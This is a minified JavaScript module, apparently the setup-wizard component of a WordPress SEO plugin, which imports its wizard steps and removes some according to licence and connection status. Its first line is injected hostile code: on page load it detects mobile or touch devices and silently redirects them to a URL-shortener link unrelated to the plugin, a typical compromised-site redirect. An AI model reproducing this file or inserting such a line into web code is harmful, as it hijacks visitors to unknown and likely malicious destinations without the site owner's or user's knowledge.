(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{w as e,p as i,b as s,y as n,h as p}from"./app-core.c8323d51.js";import m from"./AdditionalInformation.620c018a.js";import a from"./Category.309d32fb.js";import c from"./Features.8de7a685.js";import u from"./Import.6320f345.js";import l from"./LicenseKey.907f71fd.js";import S from"./SearchAppearance.ea69fd3a.js";import f from"./SearchConsole.73a08ce7.js";import d from"./SmartRecommendations.c51a9a9e.js";import h from"./Success.2b08df1f.js";import _ from"./Welcome.bacae856.js";import{_ as g}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as y,Q as z,S as x}from"./vendor-vue-ui.232c7c36.js";import"./vendor-other.39e59221.js";import"./vendor-lodash.03129cfe.js";import"./vendor-phone.2afdf77e.js";import"./Wizard.5cb4584f.js";import"./RadioToggle.11796642.js";import"./HtmlTagsEditor.381fbf72.js";import"./Editor.7ff35261.js";import"./vendor-quill.004fcde3.js";import"./Input.af9b9f81.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Pencil.683baab8.js";import"./Trash.47f6fc0e.js";import"./Caret.aae02d8a.js";import"./UnfilteredHtml.9575a9a9.js";import"./vendor-emoji.92c96208.js";import"./ImageUploader.ff4a09f5.js";import"./Button.3cec2279.js";import"./Img.a6fa685c.js";import"./Plus.d047cf13.js";import"./SocialProfiles.aaa7d153.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./Textarea.2495325b.js";import"./SettingsRow.7bec777f.js";import"./Row.2ef96b1a.js";import"./Facebook.7befbc27.js";import"./Twitter.ee9b1c57.js";import"./Header.bdbe4a2f.js";import"./Logo.a4a419c3.js";import"./CloseAndExit.e3e6e364.js";import"./Index.6933f196.js";import"./Steps.f042bc28.js";import"./HighlightToggle.967fb38f.js";import"./Radio.9c070f11.js";import"./ImageSeo.004088ed.js";import"./ProBadge.7b829f47.js";import"./MaxCounts.7f8e863d.js";import"./GoogleSearchPreview.bde29b0b.js";import"./Url.535116f6.js";import"./PostTypeOptions.f1f12ff5.js";import"./PostTypes.9ab2ae40.js";import"./Tooltip.569a23d9.js";import"./GoogleSearchConsole.2c609745.js";import"./ConnectGoogleSearchConsole.a664c050.js";import"./Exclamation.179e5969.js";const W={setup(){return{licenseStore:p(),optionsStore:n(),rootStore:s(),searchStatisticsStore:i(),setupWizardStore:e()}},components:{AdditionalInformation:m,Category:a,Features:c,Import:u,LicenseKey:l,SearchAppearance:S,SearchConsole:f,SmartRecommendations:d,Success:h,Welcome:_},methods:{deleteStage(t){const o=this.setupWizardStore.stages.findIndex(r=>t===r);o!==-1&&this.setupWizardStore.stages.splice(o,1)}},mounted(){if(this.optionsStore.internalOptions.internal.wizard){const t=JSON.parse(this.optionsStore.internalOptions.internal.wizard);delete t.currentStage,delete t.stages,delete t.licenseKey,this.setupWizardStore.loadState(t)}this.setupWizardStore.shouldShowImportStep||this.deleteStage("import"),this.licenseStore.isUnlicensed||this.deleteStage("license-key"),this.searchStatisticsStore.isConnected&&this.deleteStage("search-console"),this.rootStore.isPro&&this.deleteStage("smart-recommendations")}};function $(t,o,r,w,A,C){return y(),z(x(t.$route.name))}const Bt=g(W,[["render",$]]);export{Bt as default};
